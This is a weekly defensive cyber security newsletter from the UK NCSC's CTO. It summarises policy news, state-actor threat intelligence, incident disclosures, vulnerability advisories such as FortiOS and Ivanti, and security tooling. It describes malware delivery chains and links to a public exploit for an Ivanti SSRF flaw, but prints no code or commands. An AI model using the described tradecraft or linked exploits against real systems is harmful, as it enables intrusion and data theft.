CTO at NCSC Summary: week ending February 11th
Edge security appliances continue to pose a threat to global cyber security...
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week security device vulnerabilities, exploitation and cleanup all continue to consume focus, energy and resource across the globe.
In the high-level this week:
The Pall Mall Process: tackling the proliferation and irresponsible use of commercial cyber intrusion capabilities - Declaration after the event hosted by the UK and France in London this week.
QR Codes - what's the real risk? - from the team here at the UK’s National Cyber Security Centre to bring some pragmatic analysis to the situation.
EU capitals fear Russian retaliation and cyberattacks after asset freezes - “The EU diplomat cautioned that Russia might also escalate its cyberattacks against Western financial institutions in a bid to get its money back”
The U.S.’s FAR-Reaching New Cybersecurity Rules for Federal Contractors - “two notable items stand out: first, mandated vendor compliance with the Cybersecurity and Infrastructure Security Agency’s (CISA’s) Binding Operational Directives (BODs) and Emergency Directives (EDs) for non-cloud systems; and second, the expansion of required Federal Risk and Authorization Management Program (FedRAMP) compliance to cloud systems used by vendors on behalf of the federal government, not just those used by the government itself.”
UN Cybercrime Treaty Could Endanger Web Security - Royal Hansen gives their analysis of the risk here - “as we know well from helping stand up the Security Researcher Legal Defense Fund, individuals working to advance cybersecurity for the public good end up facing criminal charges. The Cybercrime Treaty should not criminalize the work of legitimate cybersecurity researchers and penetration testers, which is designed to protect individual systems and the web as a whole. “
Palo Alto Networks hit with $151.5 mln verdict in Centripetal patent trial - “The jury agreed with Centripetal that Palo Alto's security software infringed four patents related to Centripetal's "threat intelligence gateway" network-security technology.”
First EU-wide cybersecurity certification scheme to make European digital space safer - “The Commission has adopted the first-ever European cybersecurity certification scheme, in line with the EU Cybersecurity Act. The scheme offers a Union-wide set of rules and procedures on how to certify ICT products in their lifecycle and thus make them more trustworthy for users.”
Ransomware Payments Exceed $1 Billion in 2023, Hitting Record High After 2022 Decline - according to analysis by Chainalysis - “our initial reporting for 2022 in last year’s crime report showed $457 million in ransoms, but this figure has since been revised upward by 24.1%.”
Interlinked Computing in 2040: Safety, Truth, Ownership, and Accountability - “Computer systems are increasingly interconnected, magnifying benefits and risks, especially with AI integration. Using a Delphi-based method, we interviewed technology futurists about potential trends towards 2040 and their societal impacts. Our findings highlight five key forecasts related to artificial intelligence and system complexity, and suggest six interventions to mitigate negative impacts”
Treasury Sanctions Actors Responsible for Malicious Cyber Activities on Critical Infrastructure - “Today, the Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned six officials in the Iranian Islamic Revolutionary Guard Corps Cyber-Electronic Command (IRGC-CEC), an Iranian government organization responsible for a series of malicious cyber activities against critical infrastructure in the United States and other countries.”
Fingerprint photo led investigators to therapy centre hacking suspect in Finland - “A key clue came from a photo uploaded to the image sharing platform Ylilauta. The picture shows just a hand holding a bottle, but an examination of its fingerprints led investigators to realise it was Kivimäki's hand. The photo was found to have been uploaded from a server linked to the network police were investigating.”
Defending Democracy
Atlantic Council Report - Targeting Ukraine through Washington: Russian election interference, Ukraine, and the 2024 US election - “This issue brief describes Russia’s interest in Ukraine as it interfered in past US elections, why the current state of play might shape interference in the 2024 US elections, and what policymakers must watch. It makes three core recommendations: implement the legislative reforms to foreign espionage, agents, and lobbying disclosure laws recommended in the Senate’s bipartisan review of the 2016 election; watch the Putin regime’s war on Ukraine and identify any new cyber and information tactics; and intensify the practice of public intelligence disclosures concerning Russian covert influence activities and Russian cyber and information operations. “
Reporting on/from China
Shanghai-backed firm raises $933 mln to build satellite constellation - “Shanghai municipal government-backed Shanghai Spacecom Satellite Technology (SSST) has raised 6.7 billion yuan ($933 million) for the construction of a low-orbit satellite constellation, one of its investors said on Thursday. The series A capital raise was led by a fund set up by the National Manufacturing Transformation and Upgrading Fund (NMTUF), CAS Star said in a statement.”
Missing Boxes, an Email From China: How a Chip Shipment Sparked a U.S. Probe - “Autonomous-trucking company TuSimple facing several federal investigations, was preparing to exit from the American market for China when the CEO directed his staff to ship advanced semiconductors out of the U.S.”
Armies of bots battled on Twitter over Chinese spy balloon incident according to New Scientist - “Large proportions of users posting on Twitter – now X – about the Chinese balloon that drifted over the US and Canada in 2023 were bots attempting to shape the debate”
China's CXMT aims to build country's first advanced memory chips for AI - “ChangXin Memory Technologies (CXMT) is racing to produce China's first domestic high bandwidth memory, a critical component in artificial intelligence computing, as the country battles U.S. export controls and looks to reduce its reliance on foreign suppliers.”
Nvidia’s newly-tailored China chip to compete with rival Huawei product - “Nvidia has started to take pre-orders for its H20, a powerful graphics processing unit used in AI training. US trade sanctions prevent Nvidia from exporting to China its more advanced GPUs, such as the A100 and H100”
Tesla, Porsche chip in as Shanghai allays cross-border data flow ‘sore point’ - “While details of the categorisation criteria have not been released, Lu promised that the list of general data would be progressively expanded in a fashion similar to how China reduced the so-called negative list of the industries that banned foreign investors.”
Artificial intelligence
UK Defence Artificial Intelligence (AI) Playbook - Opening doors for industry to collaborate with Defence on AI development for the strategic advantage of our Armed Forces.
FCC Chairwoman: Make AI Voice-Generated Robocalls Illegal - “AI-generated voice cloning and images are already sowing confusion by tricking consumers into thinking scams and frauds are legitimate. No matter what celebrity or politician you favor, or what your relationship is with your kin when they call for help, it is possible we could all be a target of these faked calls,” said FCC Chairwoman Jessica Rosenworcel. “That’s why the FCC is taking steps to recognize this emerging technology as illegal under existing law, giving our partners at State Attorneys General offices across the country new tools they can use to crack down on these scams and protect consumers.”
U.S. Commerce Secretary Gina Raimondo Announces Key Executive Leadership at U.S. AI Safety Institute - “Elizabeth Kelly will lead the AI Safety Institute. I’m also thrilled that Elham Tabassi will expand her work at NIST and play a central role on our executive leadership team. Together, they will provide the direction and expertise we need to mitigate the risks that come with the development of this generation-defining technology, so that we can harness its potential,” said Secretary Raimondo. “Thanks to President Biden’s leadership, we’re in a position of power to meet the challenges posed by AI, while fostering America’s greatest strength: innovation.”
Grounded language acquisition through the eyes and ears of a single child - “Using longitudinal head-mounted camera recordings from one child aged 6 to 25 months, we trained a relatively generic neural network on 61 hours of correlated visual-linguistic data streams, learning feature-based representations and cross-modal associations. Our model acquires many word-referent mappings present in the child’s everyday experience, enables zero-shot generalization to new visual referents, and aligns its visual and linguistic conceptual systems. These results show how critical aspects of grounded word meaning are learnable through joint representation and associative learning from one child’s input.”
i-am-a-bot: An Multi-Modal LLM Powered Agent to automatically solve Captchas - Not high-level, but high-level people should be aware of it.
Cyber proliferation
Announcement of a Visa Restriction Policy to Promote Accountability for the Misuse of Commercial Spyware - United States Department of State
Buying Spying: How the commercial surveillance industry works and what can be done about it
Alleged Jordan and Pegasus usage
CPJ calls for an investigation into the targeting of journalists with Pegasus spyware in Jordan - Committee to Protect Journalists
Citizen Lab says Confirming Large-Scale Pegasus Surveillance of Jordan-based Civil Society
Bounty Hunting
Foreign Malicious Cyber Activity Against U.S. Critical Infrastructure - Rewards for Justice is offering a reward of up to $10 million for information leading to the identification or location of any person who, while acting at the direction or under the control of a foreign government against CNI
The reflections this week are around below threshold technology. That is technology be it hardware, software or models which are designed to fit under the bar set by export controls or other constraints. It is clear there is a degree of creativity being shown by vendors and it puts into context the challenges around control of technology, especially when we consider horizontal scaling, multimodal models, fine tuning etc.
Think someone else would benefit? Share:
All attribution is by others and not the UK Government unless specifically stated as such, please see the legal text at the end.
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Reporting on Russia
Analysis and Detection of STEADY#URSA Attack Campaign Targeting Ukraine Military Dropping New Covert SUBTLE-PAWS PowerShell Backdoor
D. Iuzvyk, T.Peck and O.Kolesnikov detail an alleged Russian campaign.
Throughout the entire attack campaign, most of the code executed by the malware was PowerShell. The exploitation chain is relatively simple: it involves the target executing a malicious shortcut (.lnk) file which loads and executes a new PowerShell backdoor payload code (found inside another file contained within the same archive). This custom Powershell backdoor is currently being tracked as “SUBTLE-PAWS” by the team.
Reporting on China
PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure
Our US partners along with the UK and our Canadian, Australian and New Zealand partners we have collectively issued reporting around this threat.
The National Security Agency (NSA) has joined partners to issue a Cybersecurity Advisory (CSA) to address People’s Republic of China (PRC) targeting of U.S. critical infrastructure. The CSA, entitled “PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure,” is led by the Cybersecurity and Infrastructure Security Agency (CISA) in partnership with NSA, the Federal Bureau of Investigation (FBI), and additional government agencies.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-038a
China cyber-attacks the Ministry of Foreign Affairs' system, causing a large-scale information leak including public cables according to Japanese news reports…
High-level Japanese news reporting here:
It has been revealed that the Ministry of Foreign Affairs' system for exchanging public cables containing confidential diplomatic information was attacked by a Chinese cyberattack, resulting in a large-scale information leak. The U.S. government issued a warning to the Japanese government in 2020 and requested a response, and the Japanese side has been inspecting the systems of major government agencies and hastening to strengthen countermeasures.
KV-Botnet: Don’t call it a Comeback
I spent some time with a commercial Threat Intelligence team this week where I challenged how do we impose cost and know the impact of infrastructure disruption. As if by magic this impact assessment came out from Lumen on the impact from the joint operation against Chinese covert infrastructure.
Black Lotus Labs has not been able to recover the malware samples associated with the x.sh cluster payload servers. And while the JDY, KV, and Fortinet clusters all shared some backend infrastructure, x.sh used a different set of infrastructure. Considering all factors, we assess with moderate confidence that x.sh is a separate activity cluster and distinct from the other three. ... We assess that KV-botnet has encountered significant resistance over the past several weeks. We believe that the main arm of the botnet, the KV cluster, has been rendered inert due to the action of U.S. law enforcement. We assess that the Fortinet activity had dissipated sometime in August of 2023. The JDY cluster has lost over half of its bots in the past month, but still remains operational. Finally, the signal associated with the x.sh cluster has been lost, likely due to public exposure.
https://blog.lumen.com/kv-botnet-dont-call-it-a-comeback/
MIVD Advisory Coathanger
Netherlands Ministry of Defence detail this alleged Chinese intrusion into their networks via a Firewall.
The Ministry of Defence (MOD) of the Netherlands was impacted in 2023 by an intrusion into one of its networks. The effects were limited because of prior network segmentation. − Incident response uncovered previously unpublished malware, a remote access trojan (RAT) designed specifically for Fortigate appliances. It is used as second-stage malware, and does not exploit a new vulnerability. Intelligence services MIVD & AIVD refer to the malware as COATHANGER based on a string present in the code.
The COATHANGER malware is stealthy and persistent. It hides itself by hooking system calls that could reveal its presence. It survives reboots and firmware upgrades.
MIVD & AIVD assess with high confidence that the malicious activity was conducted by a statesponsored actor from the People’s Republic of China. This is part of a wider trend of Chinese political espionage against the Netherlands and its allies.
MIVD & AIVD assess that use of COATHANGER may be relatively targeted. The Chinese threat actor(s) scan for vulnerable edge devices at scale and gain access opportunistically, and likely introduce COATHANGER as a communication channel for select victims
https://www.ncsc.nl/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear
https://github.com/JSCU-NL/COATHANGER
New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization
A low confidence alleged attribution, but more living off the land activity and a new implant family.
[We] discovered a new, stealthy espionage campaign that has likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.”
We believe an advanced threat actor is carrying out this attack, based on the deployment of the custom backdoor Zardoor, the use of modified reverse proxy tools, and the ability to evade detection for several years.
Throughout the campaign, the adversary used living-off-the-land binaries (LoLBins) to deploy backdoors, establish command and control (C2), and maintain persistence.
At this time, we have only discovered one compromised target, however, the threat actor’s ability to maintain long-term access to the victim’s network without discovery suggests there could be others.
Based on Talos’ and third-party research, the use of reverse proxy tools overlaps with TTPs employed by several threat groups originating from China. Still, we can assess the relations of the new threat actor with the existing groups only with low confidence, as open-source tools can be used by any threat actor. The choice of the compromised target does not align with the known objectives of any known threat actors originating from China.
https://blog.talosintelligence.com/new-zardoor-backdoor/
PAPERWALL: Chinese Websites Posing as Local News Outlets Target Global Audiences with Pro-Beijing Content
Alberto Fittarelli details an interesting alleged Chinese campaign as part of what appears to be a potential information operation.
A network of at least 123 websites operated from within the People’s Republic of China while posing as local news outlets in 30 countries across Europe, Asia, and Latin America, disseminates pro-Beijing disinformation and ad hominem attacks within much larger volumes of commercial press releases. We name this campaign PAPERWALL.
PAPERWALL has similarities with HaiEnergy, an influence operation first reported on in 2022 by the cybersecurity company Mandiant. However, we assess PAPERWALL to be a distinct campaign with different operators and unique techniques, tactics and procedures.
PAPERWALL draws significant portions of its content from Times Newswire, a newswire service that was previously linked to HaiEnergy. We found evidence that Times Newswire regularly seeds pro-Beijing political content, including ad hominem attacks, by concealing it within large amounts of seemingly benign commercial content.
A central feature of PAPERWALL, observed across the network of websites, is the ephemeral nature of its most aggressive components, whereby articles attacking Beijing’s critics are routinely removed from these websites some time after they are published.
We attribute the PAPERWALL campaign to Shenzhen Haimaiyunxiang Media Co., Ltd., aka Haimai, a PR firm in China based on digital infrastructure linkages between the firm’s official website and the network.
While the campaign’s websites enjoyed negligible exposure to date, there is a heightened risk of inadvertent amplification by the local media and target audiences, as a result of the quick multiplication of these websites and their adaptiveness to local languages and content.
Reporting on North Korea
Kimsuky disguised as a Korean company signed with a valid certificate to distribute Troll Stealer…
Jiho Kim & Sebin Lee detail what they suspect might be a North Korean stealer campaign. The use of an legitimate code signing certificate is of note.
The hunted malware is an Info-stealer malware written in Go language that steals information from the infected system, which is dropped and executed from a Dropper disguised as a security program installation file (TrustPKI, NX_PRNMAN) from SGA Solutions.
The dropper runs as a legitimate installer alongside the malware, and both the dropper and malware are signed with a valid, legitimate “D2innovation Co.,LTD” certificate, suggesting that the company’s certificate was actually stolen.
(Behaviors) Troll Stealer can steal information from the infected system like SSH, FileZilla, C drive files/directories, browser, system information, screen captures and send it to the C&C server.
(Attribution) Based on the Kimsuky group’s recent active use of Go-based malware, and the fact that Troll Stealer contains a lot of code similar to the AppleSeed and AlphaSeed malware associated with the Kimsuky group, we speculate that the Kimsuky group is behind the distribution of this malware.
Chinese reporting on the same campaign which might hint at a supply chain compromise.
[We] discovered a batch of secret-stealing attack samples disguised as product installation programs owned by the Korean software company SGA. After the samples are run, they release normal installation packages to confuse the victims, and secretly execute malicious DLLs processed by VMProtect. The malicious DLLs are generated by Implemented in Go language, it collects various information on the infected device and sends it back to the attacker, and then clears the traces of the attack.
According to the digital signature carried by the stealth software sample, we are associated with another malware used as a backdoor, also written for Go and with a VMProtect protective shell. This backdoor software has many overlapping features with historical attack samples of the Kimsuky organization, so we believe that both malware are related to the Kimsuky organization.
Kimsuky organization uses Dropbox cloud to conduct operational analysis
Chinese reporting on an alleged campaign here by North Korea using very basic Windows tradecraft for initial access i.e. attachments via e-mail and then using Dropbox to deliver the second stage.
In this incident, the attacker sent a malicious LNK file disguised as a PDF to the target to download the subsequent payload . The name of the file "트레이딩스파르타코스강의안-100불남(2차)" translates to "Trading Spartacus Lecture Notes" -$100 (Second Issue)", the suspected target of the attack is people related to the digital currency/financial field.
The lnk command first downloads the second-stage payload "ps.bin" through dropbox and executes it.
BlueShell malware used to attack domestic Linux systems (2)
Alleged continued use of this Linux implant by a supposed North Korean actor. The fact they continue implies they are likely being successful. So if you don’t have coverage of your Linux estate this is the business case.
BlueShell malware created by the same attacker continues to be collected through VirusTotal. Although the host name of the Linux system is checked as a condition for checking the attack target, it is difficult to specify the attack target with that information alone, and related information such as the initial penetration method cannot be confirmed with the malicious code alone. However, as a new dropper malware disguised as an id command was confirmed and additional malware and C&C servers were confirmed, here we analyze and organize the additionally collected malware along with the BlueShell malware mentioned in the previous blog.
https://asec.ahnlab.com/ko/61293/
Reporting on Iran
Iran accelerates cyber ops against Israel from chaotic start
Clint Watts details what is alleged Iranian activity showing potential correlation with wider events and what responses in the future might look like. Doctrinal insights maybe?
Since Hamas attacked Israel in October 2023, Iranian government-aligned actors have launched a series of cyberattacks and influence operations (IO) intended to help the Hamas cause and weaken Israel and its political allies and business partners. Many of Iran’s immediate operations after October 7 were hasty and chaotic – indicating it had little or no coordination with Hamas – but it nevertheless has achieved growing success. Four findings stick out:
A 42% increase in traffic, in the first week of the war, to news sites run by or affiliated to the Iranian state. Even three weeks later, this traffic was still 28% above pre-war levels.
Despite early Iranian claims, many “attacks” in the early days of the war were either “leaking” old material, using pre-existing access to networks or were false.
Iran’s activity quickly grew from nine Microsoft-tracked groups active in Israel during the first week of the war to 14, two weeks into the war. Cyber-enabled influence operations went from roughly one operation every other month in 2021 to 11 in October 2023 alone.
As the war progressed, Iranian actors expanded their geographic scope to include attacks on Albania, Bahrain and the USA. They also increased their collaboration, enabling greater specialization and effectiveness.
https://blogs.microsoft.com/on-the-issues/2024/02/06/iran-accelerates-cyber-ops-against-israel/
Reporting on Other Actors
Smargaft Harnesses EtherHiding for Stealthy C2 Hosting
Alex.Turing and Acey9 do outline some legitimately novel command control here.
it uses the Binance Smart Chain to host commands and control(C2) server, and it spreads through Shell scripts to keep itself going like Virus. When looking closer, we noticed that some antivirus vendors flagged this botnet as Mirai, which isn't right. Because of its smart use of contracts and Gafgyt's methods, we've decided to call it Smargaft. It mainly does DDoS attacks, runs system commands, and lets users connect anonymously using socks5 proxy.
https://blog.xlab.qianxin.com/smargaft_abusing_binance-smart-contracts_en/
Phishception - SendGrid is abused to host phishing attacks impersonating itself
When Software-as-a-Service is used to attack itself, likely some lessons in here.
[We] recently observed that criminals abused SendGrid’s services to launch a phishing campaign impersonating SendGrid itself. The well-known provider, now owned by Twilio, makes sending emails at scale simple and flexible. In addition to scale, the promise of high deliverability and feature-rich tools make Sendgrid a sought-after service for legitimate businesses and a likely target for criminals.
The campaign observed uses a variety of complex lures, such as claiming the victim’s account has been suspended while its sending practices are reviewed or that the victim’s account is marked for removal due to a recent payment failure, combined with other SendGrid features to mask the actual destination of any malicious links.
https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
A backdoor with a cryptowallet stealer inside cracked macOS software
Sergey Puzan details a campaign riding on a the back of pirated software.. You wouldn’t steal a car!
A month ago, we discovered some cracked apps circulating on pirating websites and infected with a Trojan proxy. The malicious actors repackaged pre-cracked applications as PKG files with an embedded Trojan proxy and a post-install script initiating the infection. We recently caught sight of a new, hitherto unknown, macOS malware family that was piggybacking on cracked software. The threat proved far more potent than an unauthorized proxy server installation.
https://securelist.com/new-macos-backdoor-crypto-stealer/111778/
Facebook Advertising Spreads Novel Malware Variant "Ov3r_Stealer"
More malvertising with a sophisticated lure but a rather clumsy technical chain.
[We] discovered a new malware named Ov3r_Stealer. At a high level, this malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors
The initial attack vector for this malware at the time of discovery was through a Facebook job advertisement for an Account Manager position. Weaponized links brought the user to a malicious Discord content delivery URL, which in turn began the execution phase of the attack. In our victim’s environment, a Powershell script masquerading as a Windows Control Panel binary was executed that downloaded the malware from a GitHub site in the form of three files. During the investigation into the malware family, our SpiderLabs teams discovered other methods of loading the malware onto the system which included HTML Smuggling, SVG Smuggling, and LNK file masquerading.
https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/FaceBook_Ad_Spreads_Novel_Malware.pdf
Discovery
How we find and understand the latent compromises within our environments.
Identifying and Mitigating Living Off the Land Techniques
We all collaborated on this work product to provide practical advice on how to detect living off the land.
Microsoft Breach — What Happened? What Should Azure Admins Do?
Andy Robbins provides a useful guide on the underlying technical aspects of the tradecraft and how to practically detect it.
https://posts.specterops.io/microsoft-breach-what-happened-what-should-azure-admins-do-da2b7e674ebc
Lior Sonntag provides a similar guide with some detection queries (Andy’s is more detailed).
https://www.wiz.io/blog/midnight-blizzard-microsoft-breach-analysis-and-best-practices
External domain activity report in Teams admin center
New feature which will be useful to cyber defence teams.
The report will surface the list of domains that your tenant has communicated with via managed communication, and how many internal users have been part of that communication.
Defence
How we proactively defend our environments.
Conditional Access architecture and personas
So we don’t all design it slightly wrong..
This article describes a Conditional Access architecture that adheres to Zero Trust principles. The architecture uses a persona-based approach to form a structured Conditional Access framework.
https://learn.microsoft.com/en-us/azure/architecture/guide/security/conditional-access-architecture
Incident Writeups & Disclosures
How they got in and what they did.
AnyDesk Incident Response 2-2-2024
Details on the who, how are still pending, but this happened.
We have revoked all security-related certificates and systems have been remediated or replaced where necessary. We will be revoking the previous code signing certificate for our binaries shortly and have already started replacing it with a new one.
Our systems are designed not to store private keys, security tokens or passwords that could be exploited to connect to end user devices. As a precaution, we are revoking all passwords to our web portal, my.anydesk.com, and we recommend that users change their passwords if the same credentials are used elsewhere.
https://anydesk.com/en/public-statement
https://anydesk.com/en/public-statement-2-2-2024
https://anydesk.com/en/faq-incident
Final update on November 2023 security incident involving unauthorized access at New Relic
Conclusions from the investigation here.
The unauthorized actor utilized a single New Relic employee account to gain access to New Relic’s Staging Environment.
All activity by the unauthorized actor within New Relic’s Staging Environment has been comprehensively identified and reviewed by New Relic and our industry-leading forensic firms.
Between October 24 and November 15, 2023, the unauthorized actor executed specific search queries and exfiltrated these query results from the Staging Environment.
The last observed unauthorized activity in the Staging Environment was on November 16, 2023. There is no indication of persistent access by the unauthorized actor in New Relic’s Staging Environment.
A very small percentage of our customers were impacted by the search queries executed by the unauthorized actor.
There is no indication of lateral movement from our Staging Environment to any customers’ New Relic accounts in the separate production environment or to New Relic’s production infrastructure.
Vulnerability
Our attack surface.
Critical Vulnerability in FortiOS
Upgrade or workaround.
The ASD’s ACSC is aware of an Unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2024-21762) in Fortinet FortiOS devices.
CVE-2024-21762 refers to an out-of-bounds write vulnerability that may allow Unauthenticated RCE via a specially crafted HTTP request.
Vendor note
Workaround : disable SSL VPN (disable webmode is NOT a valid workaround)
https://www.fortiguard.com/psirt/FG-IR-24-015
Remote user impersonation and takeover vulnerability in Mastodon
Be interesting to see how fast and comprehensive the fediverse patches here.
Due to a gap in validation of federated content in the affected Mastodon versions, attackers can craft payloads that impersonate remote federated accounts as-seen-from the affected server.
Every Mastodon version prior to 3.5.17 is vulnerable, as well as 4.0.x versions prior to 4.0.13, 4.1.x version prior to 4.1.13, and 4.2.x versions prior to 4.2.5.
https://github.com/mastodon/mastodon/security/advisories/GHSA-3fjr-858r-92rw
Zyxel VPN Series Pre-auth Remote Command Execution
N-days inbound..
Chaining of three vulnerabilities allows unauthenticated attackers to execute arbitrary command with root privileges on Zyxel VPN firewall (VPN50, VPN100, VPN300, VPN500, VPN1000). Due to recent attack surface changes in Zyxel, the chain described below broke and become unusable – we have decided to disclose this even though it is no longer exploitable.
https://ssd-disclosure.com/ssd-advisory-zyxel-vpn-series-pre-auth-remote-command-execution/
Supplemental Direction V1: ED 24-01: Mitigate Ivanti Connect Secure and Ivanti Policy Secure Vulnerabilities
CISA issued this which meant last Friday all devices had to be pulled and put back to a good state before they could be connected.
Offense
Attack capability, techniques and trade-craft.
How We Were Able to Infiltrate Attacker Telegram Bots
Tzachi Zornstein does things which would not be possible in the UK as a private sector research firm.
Attackers often utilize Telegram bots to extract victims' data.
Monitoring an attacker's communication can provide valuable information.
It is possible to forward messages from an attacker's bot to your own Telegram account.
https://checkmarx.com/blog/how-we-were-able-to-infiltrate-attacker-telegram-bots/
Exploitation
What is being exploited.
Raspberry Robin Keeps Riding the Wave of Endless 1-Days
Two new 1-day LPE exploits were used by the Raspberry Robin worm before they were publicly disclosed, which means that Raspberry Robin has access to an exploit seller or its authors develop the exploits themselves in a short period of time.
Raspberry Robin is continually updated with new features and evasions to be even stealthier than before.
Raspberry Robin slightly changed its communication method and lateral movement to avoid being caught by behavioral signatures implemented based on its previous version.
Raspberry Robin is spread with a new delivery method, disguising as a legitimate Windows component.
https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/
CVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure
Exploit out..
CVE-2024-21893 is server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
https://github.com/h4x0r-dz/CVE-2024-21893.py
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
TEx: Telegram Monitor
Given Telegram is the Mos Eisley of the Internet this tool from Guilherme Bacellar which allow various intelligence flows..
TEx is a Telegram Explorer tool created to help Researchers, Investigators and Law Enforcement Agents to Collect and Process the Huge Amount of Data Generated from Criminal, Fraud, Security and Others Telegram Groups.
https://github.com/guibacellar/TEx
deluder: Deluder is a tool for intercepting traffic of proxy unaware applications
Michal Válka releases a tool which will have a variety of valuable analysis use cases.
Deluder is a tool for intercepting traffic of proxy unaware applications. It is based on Frida and uses dynamic instrumentation to intercept communication in common networking libraries on multiple platforms.
https://github.com/Warxim/deluder
Ivanti-ICT-Snapshot decryption
HiSe from Germany releases this valuable work aid.
In this script, only the decryption function has been retained. This makes it simple and less error-prone
https://github.com/HiS3/Ivanti-ICT-Snapshot-decryption
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
Github PoC Exploits Data Analysis "Prediction" for the year 2024 - we embark on a thorough exploration of time series analysis concerning GitHub's Exploit Proof of Concept (PoC) repositories. We scrutinize trends, seasonal fluctuations, and uncover a plethora of enlightening patterns ingrained in the dataset.
Location Tracking on The Battlefield - an attacker could use these interfaces to request the location (down to the GPS level), of a targeted mobile device
the target identity be known in advance
the capability and access to attack
the mobile network is in place the targeted networks’ signaling defences do not repel the attacks
FETTA Project Launched to Strengthen EU Cyber Threat Intelligence - "One of the key cybersecurity challenges in Europe is reducing reliance on threat intelligence from non-EU countries"
Artificial intelligence
Books
Nothing this week
Events
Data Privacy Day at Duke 2024 was on February 2nd
Two videos this week from the from the Cyber Peace Institute and their Cyber Attacks in Times of Conflict Video Series
Unless stated otherwise, linked or referenced content does not necessarily represent the views of the NCSC and reference to third parties or content on their websites should not be taken as endorsement of any kind by the NCSC. The NCSC has no control over the content of third party websites and consequently accepts no responsibility for your use of them.
This newsletter is subject to the NCSC website terms and conditions which can be found at https://www.ncsc.gov.uk/section/about-this-website/terms-and-conditions and you can find out more about how will treat your personal information in our privacy notice at https://www.ncsc.gov.uk/section/about-this-website/privacy-statement.